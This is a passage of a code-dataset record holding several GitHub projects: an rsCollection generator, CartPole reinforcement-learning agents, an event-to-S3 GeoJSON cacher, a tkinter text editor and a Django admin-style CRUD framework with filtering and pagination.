add the content to the xml-tree\ndef addFolder(parentNode, path, verbose, link, exclude):\n if verbose:\n print '[READ ] Directory\\t' + path\n for entry in os.listdir(path):\n if not isMatching(exclude, entry): # Check for a match with one of the exclude-regEx\n if os.path.isdir(os.path.join(path, entry)):\n child = parentNode\n if not link:\n child = xml.Element('Directory', name=entry)\n parentNode.append(child)\n addFolder(child, os.path.join(path, entry), verbose, link, exclude) # recursive call\n else:\n addFile(parentNode, path, entry, verbose, link) # Add file\n\n# function to add a file to the tree\ndef addFile(parentNode, path, name, verbose, link): \n file = os.path.join(path, name)\n if verbose:\n print '[READ ] File\\t\\t' + file\n if not link:\n child = xml.Element('File')\n child.set('name', name)\n child.set('sha1', hashfile(file))\n child.set('size', str(os.path.getsize(file)))\n parentNode.append(child)\n else:\n print 'retroshare://file?name=' + name + '&size=' + str(os.path.getsize(file)) + '&hash=' + hashfile(file)\n\n# function to print the header with basic informations about this script\ndef printHeader():\n print 'rsCollection generator by Amarandus'\n print ''\n print 'This script is released under the'\n print 'DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE Version 2'\n print '(Check the Code for the full license)'\n print ''\n print 'Please be social and keep the generated rsCollection and the corresponding files in your share.'\n print ''\n\n# function to print the usage and exit\ndef printUsage():\n printHeader()\n print 'Usage:'\n print '\\trscGenerator.py [options] [folder]...'\n print ''\n print 'Options:'\n print ' -e\\t--exclude=REGEX\\tExcludes files and folders matching the REGEX'\n print '\\t\\t\\t(By matching the name, not the full path)'\n print ' -h\\t--help\\t\\tShow this screen'\n print ' -l\\t--link\\t\\tPrints retroshare://-links to copy and paste'\n print ' -o\\t--output=FILE\\tWrite the rsCollection into FILE.'\n print '\\t\\t\\tIf not given, it will write into ./generated.rscollection' \n print ' -s\\t--stdout\\tPrint the XML-Tree to stdout. It overrides -o, so no file will be created.'\n print '\\t\\t\\tIt also prevents any output except the XML-Tree.'\n print ' -v\\t--verbose\\tShow what the Script is doing'\n exit()\n\n# main-function\ndef main():\n if len(sys.argv) <= 1: # Not enough arguments\n printUsage()\n \n # Set some defaults:\n verbose = False\n output = 'generated.rsCollection'\n exclude = [] \n stdout = False\n quiet = False\n link = False\n \n # Care for the arguments\n argletters = 'hve:o:sql'\n argwords = ['help', 'exclude=', 'output=', 'verbose', 'stdout', 'quiet', 'link']\n triggers, targets = getopt.getopt(sys.argv[1:], argletters, argwords) \n if len(targets) is 0:\n printUsage()\n \n for trigger, value in triggers:\n if trigger in ['-h', '--help']:\n printUsage()\n elif trigger in ['-e', '--exclude']:\n exclude.append(value)\n elif trigger in ['-o', '--output']:\n output = value\n elif trigger in ['-v', '--verbose']:\n verbose = True\n elif trigger in ['-s', '--stdout']:\n stdout = True\n quiet = True\n elif trigger in ['-l', '--link']:\n quiet = True\n link = True\n \n if quiet:\n verbose = False\n \n if not quiet:\n printHeader()\n \n # Create XML-tree\n root = xml.XML('<!DOCTYPE RsCollection><RsCollection />')\n for target in targets:\n if os.path.isdir(target):\n addFolder(root, target, verbose, link, exclude)\n else:\n path, name = os.path.split(target)\n addFile(root, path, name, verbose, link)\n \n # Make it an ElementTree\n tree = xml.ElementTree(root)\n \n # Print it or write it to a file\n if stdout:\n print ''\n print xml.tostring(tree, pretty_print=True)\n else:\n if verbose:\n print '[WRITE] File\\t\\t' + output\n tree.write(output, pretty_print=True)\n\n#call the main function\nmain()\n"
}
] | 2 |
unnat5/RL_notes
|
https://github.com/unnat5/RL_notes
|
30dc5b33c60073711060c659341046b0a5def599
|
61d8eb8a944ea4c5b6cd7ff005533c96d2e98e15
|
5b12cbb7af5332a200f5b6c16b9c04281f0886c9
|
refs/heads/master
| 2020-03-22T03:16:07.369387 | 2018-11-22T15:30:36 | 2018-11-22T15:30:36 | 139,422,201 | 4 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8039215803146362,
"alphanum_fraction": 0.8039215803146362,
"avg_line_length": 50,
"blob_id": "efc9d38915fcc9c59cf4f8ae0a269d60a3387e26",
"content_id": "59a14e0670235eeed29add7242772ecfb1a65afd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 102,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 2,
"path": "/README.md",
"repo_name": "unnat5/RL_notes",
"src_encoding": "UTF-8",
"text": "# RL_notes\nThis repository contains notes about Monte Carlo Methods, TD methods, DQN networks and etc\n"
},
{
"alpha_fraction": 0.628811776638031,
"alphanum_fraction": 0.6340693831443787,
"avg_line_length": 33.599998474121094,
"blob_id": "233218729c91ea336aa32c1a8d38809cb8def712",
"content_id": "df7d3232436d7800099846f1437da1e5faf8c70b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1902,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 55,
"path": "/CartPole_smart_agent.py",
"repo_name": "unnat5/RL_notes",
"src_encoding": "UTF-8",
"text": "## This Agent was trained using hill climbing with Adaptive Noise Scaling which comes under POLICY BASED METHODS.\n## And purpose of this script is to show a smart agent!\nimport pickle\nimport gym\nimport numpy as np\n\nwith open('hill_climbing_weight.pickle','rb') as f:\n weight = pickle.load(f)\n\n\nclass Policy():\n def __init__(self, s_size=4, a_size=2):\n \"\"\"\n Here I'm intializing the self.w with trained weights\n The basic purpose of this function is to randomly initalize the weights for the network and then we would\n optimize these weights with noise scaling(adaptive).\n \n Shape: [state_dimension,action_dimension] and softmax activation function at output layer-- when action space is discrete\n [state_dimension, 1 node] and no activation function when action space is not discrete.\n \"\"\"\n #self.w = 1e-4*np.random.rand(s_size, a_size) ##weights for simple linear policy: state_space x action_space\n self.w = weight\n \n def forward(self, state):\n \"\"\"\n Here we multipy(vectorized) our state with weights and get corresponding output \n \"\"\"\n x = np.dot(state,self.w)\n ## below is the implementation of softmax function!!\n return np.exp(x)/sum(np.exp(x))\n \n def act(self,state):\n \"\"\"\n This function decides whether we want our policy to be stochastic or determinstic policy.\n \"\"\"\n probs = self.forward(state)\n #action = np.random.choice(2,p=probs)\n action = np.argmax(probs)\n # option 1: stochastic policy\n # option 2: stochastic policy\n return action\n \n \npolicy = Policy()\n\nenv = gym.make('CartPole-v0')\n\nfor i in range(3):\n state = env.reset()\n while True:\n env.render()\n action = policy.act(state)\n state,reward,done,_=env.step(action)\n if done:\n break"
},
{
"alpha_fraction": 0.5716845989227295,
"alphanum_fraction": 0.5833333134651184,
"avg_line_length": 13.48051929473877,
"blob_id": "9323a557b2d7d069f20db7673ade433b64e60c7d",
"content_id": "4e97e6026d7341a0fcf1a02d637d63f2797e3daa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1116,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 77,
"path": "/policy_g.py",
"repo_name": "unnat5/RL_notes",
"src_encoding": "UTF-8",
"text": "\n\nimport pickle\nimport gym\nimport numpy as np\n\n\nimport torch\ntorch.manual_seed(0)\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.distributions import Categorical\n\nclass Policy(nn.Module):\n def __init__(self, s_size=4, h_size=16, a_size=2):\n super().__init__()\n self.fc1 = nn.Linear(s_size,h_size)\n self.fc2 = nn.Linear(h_size,a_size)\n \n def forward(self,x):\n x = F.relu(self.fc1(x))\n x = self.fc2(x)\n return F.softmax(x,dim=1)\n \n def act(self,state):\n state = torch.from_numpy(state).float().unsqueeze(0)\n probs =self.forward(state).cpu()\n m = Categorical(probs)\n action = m.sample()\n return action.item(),m.log_prob(action)\n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\npolicy = Policy()\npolicy.load_state_dict(torch.load('policy_G_cartpole.pth'))\nenv = gym.make('CartPole-v0')\n\nfor i in range(3):\n state = env.reset()\n while True:\n env.render()\n action,_ = policy.act(state)\n state,reward,done,_=env.step(action)\n if done:\n break"
}
] | 3 |
RagtagOpen/mfol-events-cacher
|
https://github.com/RagtagOpen/mfol-events-cacher
|
f25d0faded7b44afbab073cd0ebf766749f81e90
|
2fbc7cb6af717e8a26d92050be654e6b03538224
|
8e979ca137c1e6eb6294fac3d96a76a50134b3e8
|
refs/heads/master
| 2021-04-03T06:44:42.950957 | 2019-04-22T14:02:49 | 2019-04-22T14:02:49 | 124,775,263 | 0 | 0 |
MIT
| 2018-03-11T16:20:34 | 2018-10-29T19:35:16 | 2019-04-22T14:02:50 |
Python
|
[
{
"alpha_fraction": 0.761904776096344,
"alphanum_fraction": 0.773809552192688,
"avg_line_length": 41,
"blob_id": "e40d407a142e8bbbab11459a803900badb1ff587",
"content_id": "6a6b3b514c56137335722ef9c52c3cfceb6e766e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 84,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 2,
"path": "/README.md",
"repo_name": "RagtagOpen/mfol-events-cacher",
"src_encoding": "UTF-8",
"text": "# mfol-events-cacher\nCaches the March For Our Lives events to a GeoJSON file in S3.\n"
},
{
"alpha_fraction": 0.5278904438018799,
"alphanum_fraction": 0.5339756608009338,
"avg_line_length": 24.28205108642578,
"blob_id": "ca6bdf87ceb2a19004a26ad250cd57b30a80a2a0",
"content_id": "cb99bfeccec2f42940d69ddc7148baa742d040a1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1972,
"license_type": "permissive",
"max_line_length": 123,
"num_lines": 78,
"path": "/pull_events.py",
"repo_name": "RagtagOpen/mfol-events-cacher",
"src_encoding": "UTF-8",
"text": "import boto3\nimport json\nimport os\nimport re\nimport requests\nimport sys\n\n\ndef fetch_events_as_geojson():\n resp = requests.get('https://event.marchforourlives.com/cms/event/march-our-lives-events_attend/search_results/?all=1')\n\n features = []\n for detail_text in re.findall(r'var event_details = {(.*?)};', resp.text, re.DOTALL):\n props = {}\n for k, v in re.findall(r\"'(.*?)': '(.*?)',?\", detail_text):\n if v == \"False\":\n v = False\n elif v == \"True\":\n v = True\n elif v == \"None\":\n v = None\n\n props[k] = v\n\n feature = {\n 'type': 'Feature',\n 'properties': None,\n 'geometry': {\n 'type': 'Point',\n 'coordinates': [\n float(props.pop('longitude')),\n float(props.pop('latitude')),\n ]\n }\n }\n feature['properties'] = props\n\n features.append(feature)\n\n # Sort by the ID so the output is deterministic\n features.sort(key=lambda i: i['properties']['id'])\n\n feature_coll = {\n 'type': 'FeatureCollection',\n 'features': features,\n }\n\n print(\"Retrieved %s event features\" % len(features))\n\n return json.dumps(feature_coll, separators=(',',':'))\n\n\ndef push_to_s3(bucket, key, geojson):\n client = boto3.client('s3')\n response = client.put_object(\n Bucket=bucket,\n Key=key,\n Body=geojson.encode('utf8'),\n ACL='public-read',\n ContentType='application/json',\n )\n\n print(\"Saved to S3, etag %s\" % response['ETag'])\n\n\ndef main():\n bucket = os.environ.get('S3_BUCKET')\n key = os.environ.get('S3_KEY')\n\n assert bucket, \"Please set an S3_BUCKET environment variable\"\n assert key, \"Please set an S3_KEY environment variable\"\n\n geojson = fetch_events_as_geojson()\n push_to_s3(bucket, key, geojson)\n\n\nif __name__ == '__main__':\n main()\n"
}
] | 2 |
KhushrajSingh/anytexteditor
|
https://github.com/KhushrajSingh/anytexteditor
|
710c5c33028cceb50f6d2d1ca82ddf02f05c5953
|
7d3b3370b3006ee6916945e3338311cc55b0fcc9
|
451c6decf685be08bc8ab1e5ce016aee872a8c53
|
refs/heads/main
| 2023-02-24T13:48:23.954696 | 2021-01-24T05:47:15 | 2021-01-24T05:47:15 | 332,376,054 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6281282305717468,
"alphanum_fraction": 0.6707342267036438,
"avg_line_length": 33.29077911376953,
"blob_id": "1b504c57ee39856111bdb757431114fe557e8bfa",
"content_id": "28403acf54ecf97e812502c5294b0efb48f322dd",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4835,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 141,
"path": "/anytexteditor.py",
"repo_name": "KhushrajSingh/anytexteditor",
"src_encoding": "UTF-8",
"text": "from tkinter import * \nfrom tkinter.filedialog import asksaveasfilename ,askopenfilename \nfrom tkinter.messagebox import showinfo\nr=Tk() \nr.geometry('500x500') \nfile=None\n\nr.title('Untitled-ANY TEXT EDITOR')\n\ndef saveas(): \n global textarea,file\n file=asksaveasfilename(defaultextension='.txt',filetypes=[ ('Text Documents','.txt') ,('All Files','.')]) \n r.title(str(file)+' ANY TEXT EDITOR')\n try: \n f=open(file,mode='w') \n f.write(textarea.get(1.0,END)) \n f.close()\n showinfo('ANY TEXT EDITOR',\"FILE SAVED SUCCESSFULLY\")\n except: \n pass\ndef openit(): \n global textarea ,file,labelf ,r\n try:\n file=askopenfilename(defaultextension='.txt',filetypes=[ ('Text Documents','.txt'), ('All Files','.')]) \n f=open(file,mode='r')\n r.title(str(file))\n textarea.delete(1.0,END) \n cont=f.read() \n textarea.insert(1.0,cont) \n f.close()\n except: \n pass\ndef deletealltext(): \n global textarea,file\n textarea.delete(1.0,END)\n file=None\ndef newfile():\n global file,textarea \n file=None \n textarea.delete(1.0,END) \n r.title('Untitled-ANY TEXT EDITOR')\ntextarea=Text(r,font='arial 21 bold',width=500,height=400,pady=100,bg='yellow') \ntextarea.pack(expand=True,fill=BOTH)\nbutton=Button(r,text='SAVE CURRENT TEXT ',command=saveas,font='arial 13 bold') \nbutton.place(x=140,y=10)\nbutton2=Button(r,text=\"OPEN FILE\",command=openit,font='arial 13 bold') \nbutton2.place(x=20,y=10)\nbutton4=Button(r,text='DELETE ALL TEXT',command=deletealltext,font='arial 13 bold')\nbutton4.place(x=380,y=10)\nbutton5=Button(r,text='NEW FILE',command=newfile,font='arial 13 bold')\nbutton5.place(x=570,y=10)\nScroll = Scrollbar(textarea)\nScroll.pack(side=RIGHT, fill=Y)\nScroll.config(command=textarea.yview)\ntextarea.config(yscrollcommand=Scroll.set)\nlabel2=Label(r,text='ANY TEXT EDITOR',font='arial 20 bold',bg='yellow')\nlabel2.place(x=600,y=40)\ncanas=Canvas(r,width=2000,height=10,bg='black') \ncanas.place(x=0,y=80)\ncanas2=Canvas(r,width=2000,height=10,bg='black') \ncanas2.place(x=0,y=740)\ndef make_menu(w): \n global the_menu\n the_menu = Menu(w, tearoff=0)\n the_menu.add_command(label=\"Cut\")\n the_menu.add_command(label=\"Copy\")\n the_menu.add_command(label=\"Paste\")\ndef show_menu(e):\n w = e.widget\n global the_menu\n the_menu.entryconfigure(\"Cut\",\n command=lambda: w.event_generate(\"<<Cut>>\"))\n the_menu.entryconfigure(\"Copy\",\n command=lambda: w.event_generate(\"<<Copy>>\"))\n the_menu.entryconfigure(\"Paste\",\n command=lambda: w.event_generate(\"<<Paste>>\"))\n the_menu.tk.call(\"tk_popup\", the_menu, e.x_root, e.y_root)\nmake_menu(r)\ntextarea.bind_class(\"Text\", \"<Button-3><ButtonRelease-3>\", show_menu)\nbackgroundcolor=None\nbackgroundcolor=StringVar() \nfontcolor=None \nfontcolor=StringVar() \nfontsize=None \nfontsize=StringVar() \nent1=Entry(r,textvariable=backgroundcolor,font='arial 12 bold',bd=6) \nent1.place(x=100,y=760)\nent1=Entry(r,textvariable=fontcolor,font='arial 12 bold',bd=6) \nent1.place(x=410,y=760)\nent2=Entry(r,textvariable=fontsize,font='arial 12 bold',bd=6) \nent2.place(x=670,y=760)\ndef set_bg_color(): \n try:\n global backgroundcolor ,textarea\n color=backgroundcolor.get() \n textarea['bg']=str(color)\n except: \n pass\ndef set_fg_color(): \n try:\n global fontolor ,textarea\n color=fontcolor.get() \n textarea['fg']=str(color)\n except: \n pass\ndef set_font_sz(): \n try:\n global fontsize ,textarea \n sz=fontsize.get() \n textarea['font']='arial '+str(sz)+' bold'\n except: \n showinfo('ANY TEXT EIDTOR',\"MUST BE INTEGER VALUE\")\ndef set_def():\n global textarea\n textarea['font']='arial 21 bold'\ndef set_f():\n global textarea\n textarea['fg']='black'\ndef set_b():\n global textarea\n textarea['bg']='yellow'\ndef set_all():\n global textarea\n textarea['bg']='yellow'\n textarea['fg']='black'\n textarea['font']='arial 21 bold'\nbutton6=Button(r,text='SET BACKGROUND COLOR',font='arial 12 bold',command=set_bg_color) \nbutton6.place(x=100,y=800)\nbutton7=Button(r,text='SET FONT COLOR',font='arial 12 bold',command=set_fg_color) \nbutton7.place(x=410,y=800)\nbutton8=Button(r,text='SET FONT SIZE',font='arial 12 bold',command=set_font_sz)\nbutton8.place(x=670,y=800)\nbutton9=Button(r,text='SET DEFAULT FONT SIZE',font='arial 12 bold',command=set_def)\nbutton9.place(x=910,y=800)\nbutton9=Button(r,text='SET DEFAULT FONT COLOR',font='arial 12 bold',command=set_f)\nbutton9.place(x=910,y=760)\nbutton10=Button(r,text='SET DEFAULT BACKGROUND COLOR',font='arial 12 bold',command=set_b)\nbutton10.place(x=1210,y=760)\nbutton10=Button(r,text='SET ALL DEFAULT',font='arial 12 bold',command=set_all)\nbutton10.place(x=1210,y=800)\nr.mainloop()\n"
}
] | 1 |
maxhope8/stark
|
https://github.com/maxhope8/stark
|
fe4cf0a99614256a8d50f275ede3de3158779cea
|
4670686909b1f0e92b72f1791a0afe056da3d8f9
|
3746667a7b2c6d0c941a22a19929b0ffaf432a33
|
refs/heads/master
| 2020-11-28T03:31:16.493901 | 2019-12-23T07:01:21 | 2019-12-23T07:01:21 | 229,693,532 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6399999856948853,
"alphanum_fraction": 0.6472727060317993,
"avg_line_length": 21.91666603088379,
"blob_id": "36747d380cab3502eb2cca2f6eec11de01675480",
"content_id": "51ffdc74e7a69cbb98db819ef9a65ee8d309c290",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 301,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 12,
"path": "/starkapp/admin.py",
"repo_name": "maxhope8/stark",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\n\nclass UserAdmin(admin.ModelAdmin):\n list_display = [\"pk\", \"name\", \"age\"]\n list_filter = [\"name\", \"age\"]\n\n # 定制action具体方案\n def func(self, request,queryset):\n queryset.update(age=44)\n\n func.short_description = \"批量初始化操作\"\n"
},
{
"alpha_fraction": 0.6220095753669739,
"alphanum_fraction": 0.6244019269943237,
"avg_line_length": 22.885713577270508,
"blob_id": "9949d88376f79ea3ae0fa9791752b13621c1f90f",
"content_id": "0913eec21db3cf415395e77968a68f4fa4a20ab3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 868,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 35,
"path": "/app01/stark1.py",
"repo_name": "maxhope8/stark",
"src_encoding": "UTF-8",
"text": "from django.forms import ModelForm\n\nfrom starkapp.service.stark import site, ModelStark\nfrom app01.models import *\n\n\nclass BookModelForm(ModelForm):\n class Meta:\n model = Book\n fields = \"__all__\"\n error_messages = {\n \"title\": {'required': '不能为空'},\n \"price\": {'required': '不能为空'},\n }\n\n\n# 自定义配置类\nclass BookStark(ModelStark):\n list_display = [\"nid\", \"title\", \"price\", \"publish\", \"authors\"]\n list_display_link = [\"nid\", \"title\"]\n search_fields = [\"title\", \"price\"]\n model_form_class = BookModelForm\n list_filter = [\"authors\", \"publish\", \"title\"]\n\n def patch_list(self, queryset):\n queryset = queryset\n\n patch_list.desc = \"显示\"\n actions = [patch_list]\n\n\nsite.register(Book, BookStark)\nsite.register(Publish)\nsite.register(Author)\nsite.register(AuthorDetail)\n"
},
{
"alpha_fraction": 0.5558133125305176,
"alphanum_fraction": 0.5568923950195312,
"avg_line_length": 37.77614974975586,
"blob_id": "2d0ff33651aeebb2e26c036d2f22258b0a81faad",
"content_id": "76d5eda50a99e76eb181217045d2ba16e88658ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 19607,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 478,
"path": "/starkapp/service/stark.py",
"repo_name": "maxhope8/stark",
"src_encoding": "UTF-8",
"text": "import copy\n\nfrom django.conf.urls import url\nfrom django.db.models import ForeignKey, ManyToManyField\nfrom django.forms import ModelForm\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\nfrom django.utils.safestring import mark_safe\nfrom django.db.models.fields.related import ManyToManyField\nfrom django.forms.models import ModelChoiceField\n\n\nclass ModelStark(object):\n list_display = [\"__str__\"]\n list_display_link = []\n model_form_class = None\n search_fields = []\n actions = []\n list_filter = []\n\n def __init__(self, model, site):\n self.model = model\n self.site = site\n self.model_name = self.model._meta.model_name\n self.app_label = self.model._meta.app_label\n\n # 使用modelform组件\n def get_modelfrom_class(self):\n # from django.forms import widgets as wid\n class ModelFormClass(ModelForm):\n class Meta:\n model = self.model\n fields = \"__all__\"\n # 这样的字段就限定死了,所以我们这里不能这样使用\n # widgets = {\n # \"title\": wid.TextInput(attrs={\"class\": \"form-control\"})\n # }\n if not self.model_form_class:\n return ModelFormClass\n else:\n return self.model_form_class\n\n # 展示编辑连接\n def edit_link(self, obj=None, is_header=False):\n if is_header:\n return \"操作\"\n name = \"{}_{}_change\".format(self.app_label, self.model_name)\n return mark_safe(\"<a href=%s>编辑</a>\" % reverse(name, args=(obj.pk,)))\n\n # 原本都是在用户自己的配置类中写,但是现在写入modelStark中是因为,是因为每个表可能都能用到,减少代码重复\n def delete_link(self, obj=None, is_header=False):\n if is_header:\n return \"操作\"\n name = \"{}_{}_delete\".format(self.app_label, self.model_name)\n return mark_safe(\"<a href=%s>删除</a>\" % reverse(name, args=(obj.pk,)))\n\n def select_btn(self, obj=None, is_header=None):\n if is_header:\n return mark_safe(\"<input id='mutPut' type='checkbox'>\")\n return mark_safe(\"<input type='checkbox' value=%s name='_selected_action'>\" % obj.pk)\n\n # 获取反向解析的name\n def get_edit_url(self, obj):\n edit_url = \"{}_{}_change\".format(self.app_label, self.model_name)\n return edit_url\n\n def get_delete_url(self, obj):\n delete_url = \"{}_{}_delete\".format(self.app_label, self.model_name)\n return delete_url\n\n def get_add_url(self):\n add_url = \"{}_{}_add\".format(self.app_label, self.model_name)\n return add_url\n\n def get_list_url(self):\n list_url = \"{}_{}_list\".format(self.app_label, self.model_name)\n return list_url\n\n @property\n def get_list_display(self):\n new_list_display = []\n new_list_display.extend(self.list_display)\n # 如果设置了list_display_link就把编辑删除\n if not self.list_display_link:\n new_list_display.append(ModelStark.edit_link)\n new_list_display.append(ModelStark.delete_link)\n new_list_display.insert(0, ModelStark.select_btn)\n\n return new_list_display\n\n # 获取filter的查询条件的Q对象\n @property\n def get_filter_condition(self):\n from django.db.models import Q\n filter_condition = Q()\n for field, val in self.request.GET.items():\n # 过滤非list_filter的值,因为page在里面,加进去之后,查询条件是and,模型中没有报错\n if field in self.list_filter:\n filter_condition.children.append((field, val))\n return filter_condition\n\n @property\n def get_search_condition(self):\n from django.db.models import Q\n search_condition = Q()\n search_condition.connector = \"or\" # 设置关系为或\n if self.search_fields: # [\"title\", \"price\"]\n key_word = self.request.GET.get(\"q\", None)\n # 如果有值才添加,没有纸就直接返回空的Q()\n self.key_word = key_word\n if key_word:\n for search_field in self.search_fields:\n # 因为条件设置得是or所以这里才可以成立,如果是and,全部遍历加进去查询可能会出错\n search_condition.children.append((search_field + \"__contains\", key_word))\n return search_condition\n\n # 首页展示页面\n def change_list(self, request):\n if request.method == \"POST\":\n func_name = request.POST.get(\"action\")\n # getlist多个值处理\n pk_list = request.POST.getlist(\"_selected_action\")\n queryset = self.model.objects.filter(pk__in=pk_list)\n func = getattr(self, func_name)\n func(queryset=queryset)\n self.request = request\n add_url = self.get_add_url()\n # search模糊查询\n queryset = self.model.objects.filter(self.get_search_condition)\n # filter模糊查询\n queryset = queryset.filter(self.get_filter_condition)\n cl = ChangeList(self, request, queryset)\n\n return render(request, \"index.html\", locals())\n\n # 批量删除\n def patch_delete(self, queryset):\n queryset.delete()\n return redirect(self.get_list_url())\n patch_delete.desc = \"批量删除\"\n\n def get_actions(self):\n temp = []\n temp.extend(self.actions)\n temp.append(ModelStark.patch_delete)\n return temp\n\n def add(self, request):\n modelform = self.get_modelfrom_class()\n from django.forms.boundfield import BoundField\n form = modelform()\n for field in form:\n print(type(field.field))\n if isinstance(field.field, ModelChoiceField):\n field.is_pop = True\n related_model_name = field.field.queryset.model._meta.model_name\n related_app_name = field.field.queryset.model._meta.app_label\n _url = reverse(\"{}_{}_add\".format(related_app_name, related_model_name)) + \\\n \"?pop_res_id=id_{}\".format(field.name)\n field.url = _url\n if request.method == \"GET\":\n return render(request, \"add_index.html\", locals())\n else:\n data = request.POST\n form = modelform(data=data)\n if form.is_valid():\n obj = form.save()\n pop_res_id = request.GET.get(\"pop_res_id\")\n if pop_res_id:\n res = {\"pk\": obj.pk, \"text\": str(obj), \"pop_res_id\": pop_res_id}\n return render(request, \"pop.html\", {\"res\": res})\n else:\n return redirect(self.get_list_url())\n else:\n return render(request, \"add_index.html\", locals())\n\n def delete(self, request, id):\n del_obj = self.model.objects.filter(nid=id).first()\n if request.method == \"GET\":\n list_url = self.get_list_url()\n # 为什么要确认页面,是因为重要数据需要二次确认,防止误删\n return render(request, \"del_index.html\", locals())\n else:\n del_obj.delete()\n return redirect(self.get_list_url())\n\n # 编辑页面\n def change(self, request, id):\n form = self.get_modelfrom_class()\n obj = self.model.objects.filter(pk=id).first()\n if request.method == \"GET\":\n form = form(instance=obj)\n return render(request, \"change_index.html\", locals())\n else:\n form = form(data=request.POST, instance=obj)\n if form.is_valid():\n form.save()\n return redirect(self.get_list_url())\n else:\n return render(request, \"change_index.html\", locals())\n\n def get_urls_2(self):\n temp = []\n model_name = self.model._meta.model_name # 当前模型表\n app_label = self.model._meta.app_label # 当前app\n\n temp.append(url(r\"^add/$\", self.add, name=\"%s_%s_add\" % (app_label, model_name)))\n temp.append(url(r\"^(\\d+)/delete/$\", self.delete, name=\"%s_%s_delete\" % (app_label, model_name)))\n temp.append(url(r\"^(\\d+)/change/$\", self.change, name=\"%s_%s_change\" % (app_label, model_name)))\n temp.append(url(r\"^$\", self.change_list, name=\"%s_%s_list\" % (app_label, model_name)))\n return temp\n\n @property\n def urls_2(self):\n return self.get_urls_2(), None, None # [], None, None\n\n\nclass ChangeList(object):\n def __init__(self, config, request, queryset):\n self.config = config\n self.request = request\n self.queryset = queryset\n\n from starkapp.util.paginator import Pagination\n current_page = request.GET.get(\"page\")\n all_count = self.queryset.count()\n base_url = self.request.path_info\n params = self.request.GET\n paginator = Pagination(current_page, all_count, base_url, params)\n data_list = self.queryset[paginator.start: paginator.end]\n self.paginator = paginator\n self.data_list = data_list\n # actions 批量操作的动作\n self.actions = self.config.get_actions()\n # filter 过滤的字段\n self.list_filter = self.config.list_filter\n\n def get_filter_link_tag(self):\n link_list = {}\n data = self.request.GET\n import copy\n params = copy.deepcopy(data)\n for filter_field_name in self.config.list_filter:\n # 为什么放里面而不是放外面\n data = self.request.GET\n import copy\n params = copy.deepcopy(data)\n\n current_id = self.request.GET.get(filter_field_name, 0)\n filter_field_obj = self.config.model._meta.get_field(filter_field_name)\n # filter_field = FilterField(filter_field_name, filter_field_obj, self)\n if isinstance(filter_field_obj, ManyToManyField) or isinstance(filter_field_obj, ForeignKey):\n data_list = filter_field_obj.related_model.objects.all()\n else:\n data_list = self.config.model.objects.values_list(\"pk\", filter_field_name)\n temp = []\n # 处理全部标签\n if params.get(filter_field_name, None):\n del params[filter_field_name]\n temp.append(\"<a href='?%s'>全部</a>\" % (params.urlencode()))\n else:\n temp.append(\"<a class='active' href='?%s'>全部</a>\" % (params.urlencode()))\n # 处理数据标签\n for obj in data_list:\n if isinstance(filter_field_obj, ManyToManyField) or isinstance(filter_field_obj, ForeignKey):\n pk, text = obj.pk, str(obj)\n params[filter_field_name] = pk\n else:\n pk, text = obj\n params[filter_field_name] = text\n _url = params.urlencode()\n if current_id == str(pk) or current_id == text:\n link_tag = \"<a class='active' href='?%s'>%s</a>\" % (_url, text) # %s/%s/\n else:\n link_tag = \"<a href='?%s'>%s</a>\" % (_url, text) # %s/%s/\n temp.append(link_tag)\n link_list[filter_field_name] = temp\n # ff = FilterField(self.config, self.request)\n # link_list = ff.get_filter_link()\n return link_list\n\n def handler_action(self):\n temp = []\n for action in self.actions:\n temp.append({\"name\": action.__name__, \"desc\": action.desc if getattr(action, \"desc\", None) else action.__name__})\n return temp\n\n def get_header(self):\n header_list = []\n # 这里的代码是处理表头数据的\n for field in self.config.get_list_display:\n if callable(field):\n val = field(self.config, is_header=True)\n header_list.append(val)\n else:\n if field == \"__str__\":\n header_list.append(self.config.model._meta.model_name.upper())\n else:\n field_obj = self.config.model._meta.get_field(field)\n header_list.append(field_obj.verbose_name)\n return header_list\n\n def get_body(self):\n data_list = self.data_list\n new_data_list = []\n # 这里才是我们数据库中的数据\n for obj in data_list:\n temp = []\n for field in self.config.get_list_display:\n if callable(field):\n val = field(self.config, obj)\n else:\n try:\n field_obj = self.config.model._meta.get_field(field)\n # 对于多对多字段的现实进行处理\n if isinstance(field_obj, ManyToManyField):\n val = getattr(obj, field).all()\n val = \",\".join([str(item) for item in val])\n else:\n val = getattr(obj, field)\n # 如果有list_display_link,就把他编程a标签\n if field in self.config.list_display_link:\n val = mark_safe(\"<a href=%s>%s</a>\" % (reverse(self.config.get_edit_url(obj), args=(obj.pk,)), val))\n except Exception as e:\n val = getattr(obj, field)\n temp.append(val)\n new_data_list.append(temp)\n return new_data_list\n\n\n# 